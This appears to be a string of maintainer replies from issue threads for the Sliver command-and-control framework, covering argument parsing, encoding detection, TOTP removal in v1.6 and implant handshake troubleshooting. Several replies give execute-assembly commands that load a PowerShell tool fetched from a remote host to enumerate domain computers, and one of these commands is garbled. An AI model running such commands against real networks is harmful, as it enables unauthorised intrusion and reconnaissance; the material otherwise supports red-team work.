Joe

Try ``` execute-assembly powersharp.exe -- "/m:http://192.168.0.44:81/powerview.ps1" "/c:get-netcomputer -identity web01" ``` Same results?

Oh you know what, it's probably a nested encoding issue, it's a little un-intuitive but I think* this will work: ``` execute-assembly powersharp.exe -- \"/m:http://192.168.0.44:81/poweretcomputer -identity web01\" ```

Yea that should go here, to appease the grumble parser: ``` execute-assembly -- /opt/red/powersharp.exe \"/m:http://192.168.0.44:81/powerview.ps1\" \"/c:get-netcomputer -identity web01\" ```

The behavior is the result layering cli parsers as described [here](https://github.com/BishopFox/sliver/wiki/Aliases-&-Extensions#aliases-command-parsing) on the wiki, its working as intended. Sliver's commands are just structured differently, we'd have to modify our upstream...

I think the real bug is in the detection of case sensitive vs. case insensitive encoding, the implant should* be able to detect this manipulation and fallback to base32 but...

We've removed TOTP in v1.6, it would be good to address all these issues in that branch. Perhaps we should just use a single bit to indicate the Base32 vs....

Oh yes, you're right. We did remove the TOTP auth, but the message is still called TOTP.

I'm working on a fix for v1.6 and hoping it have it done soon, it's the last major bug before the v1.6 release!

Could be the OTP value not matching, you can check by using `--disable-otp` when starting the handler. The implant will try to reconcile the key exchange by using the server's...

Currently no, not really any way to stop an individual task/command after it's been issued aside from using `--timeout`